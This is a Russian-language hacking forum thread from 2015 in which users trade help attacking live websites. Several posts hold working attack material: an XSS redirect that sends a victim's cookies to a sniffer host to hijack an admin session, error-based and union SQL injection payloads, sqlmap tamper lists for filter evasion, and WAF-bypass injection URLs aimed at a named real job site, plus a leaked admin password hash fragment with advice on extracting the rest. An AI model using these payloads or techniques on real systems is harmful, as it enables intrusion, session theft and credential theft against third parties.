HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #841  
Старый 10.11.2015, 23:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Hussar  
Hussar said:

Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом
document.location.replace(%27
http://доменснифера.ком/sniff.php?с=doсument.сookie%27
) и в логах появляется это -
%C3%B1=do%C3%B1ument.%C3%B1ookie
Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?
у вас неверный код, который отправляет куки на сниффер. да еще и с русскими буквами внутри. прочитайте статью про XSS в разделе статей, там корректные примеры
 
Ответить с цитированием

  #842  
Старый 11.11.2015, 16:27
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection

.SpoilerTarget" type="button">Spoiler: POST параметр:

Код:
Code:
Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115)%2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cCHAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49)%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cCHAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
То есть:

Код:
Code:
Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)+"
Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет?

P.S> Походу это я что то косячу...

Погуглил прочитал что некоторые сразу все указывают, типо:

Код:
Code:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?
 
Ответить с цитированием

  #843  
Старый 11.11.2015, 19:29
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection
Spoiler: POST параметр:
Код:
Code:
Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115)%2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cCHAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49)%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cCHAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
То есть:
Код:
Code:
Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)+"
Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет?
P.S> Походу это я что то косячу...
Погуглил прочитал что некоторые сразу все указывают, типо:
Код:
Code:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?
Что бы сканер не писал,не факт что это Sql Inj . Сам по себе знаю,тоже думал SQL inj,а оказалось это сканер так подумал .
 
Ответить с цитированием

  #844  
Старый 11.11.2015, 23:27
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Что интересного можно узнать через уязвимость, где позволяется юзать функции без аргументов?

какие есть интересные функции для данного случая?
 
Ответить с цитированием

  #845  
Старый 12.11.2015, 01:19
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Код:
Code:
Запрос: 1" and(UpdateXML(0x03b,concat(0x3b,(select table_name FROM information_schema.tables limit 1,1)),0x03b))="
Результат: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ';COLLATIONS'
Как автоматизировать сборку таблиц и колонок? Сколько искал в основном все под win либо не подходит
 
Ответить с цитированием

  #846  
Старый 12.11.2015, 01:46
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

deleted. Позор мне, тупящему
 
Ответить с цитированием

  #847  
Старый 12.11.2015, 08:06
AlexG
Guest
Сообщений: n/a
Провел на форуме:
11344

Репутация: 5
По умолчанию

Цитата:
Сообщение от o314um  
o314um said:

Кто сможет обойти фильтр?
Ну очень интересный
тут не выходит почему-то, дает 403. Как видно - 3 скули по фрагментам
Код:
Code:
http://empleos.net/candidatov2/seccion/vacantes/resultados.php
?filtro[Claves]=
&filtro[Area]=11 union /*
&filtro[Pais]=16*/ select /*
&filtro[Estado]=2*/ 1,2,3%23
&filtro[Desde]=
&filtro[Hasta]=
&back=/candidatov2/seccion/vacantes/index.php
?avanzado
есть еще:
В POST параметрах. 1 столбец, но все равно что-то там плохое происходит
Код:
Code:
http://empleos.net/sel_reg.php
post data:
SubmitRevisar=Revisar
&Email=1' and 1>2 union/*!0000select*/1%23
На сайте очень много таких скулей, но этот ВАФ очень интересно обойти
Не совсем понял пример про ВАФ. Нашел свой вариант -

Код:
Code:
http://empleos.net/v2_candidatos_buscarVacantes.php?filtro[Claves]=12&filtro[Area]=43 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&filtro[Pais]=20&filtro[Estado]=416&filtro[Desde]=2015-11-25&filtro[Hasta]=2015-11-28
ВАФ в данном случае срабатывает на union, обходится элементарно. Но есть "но" - через order by получается что 14 колонок, но при попытке вывода что выше написал - "different number of columns". Видимо не так что-то делаю.
 
Ответить с цитированием

  #848  
Старый 13.11.2015, 00:27
T1B3R
Guest
Сообщений: n/a
Провел на форуме:
48321

Репутация: 1
По умолчанию

Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов...

Например:

1105 - XPATH syntax error: ':1:admin:$2y$10$l9rcQOpA52n9' SQL=SELECT f.*,al.*,
 
Ответить с цитированием

  #849  
Старый 13.11.2015, 00:32
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от T1B3R  
T1B3R said:

Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов...
Например:
1105 - XPATH syntax error: '
:1:admin:$2y$10$l9rcQOpA52n9
' SQL=SELECT f.*,al.*,
кто отменял substring?
 
Ответить с цитированием

  #850  
Старый 13.11.2015, 01:45
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от T1B3R  
T1B3R said:

Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов...
Например:
1105 - XPATH syntax error: '
:1:admin:$2y$10$l9rcQOpA52n9
' SQL=SELECT f.*,al.*,
или тот же mid.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ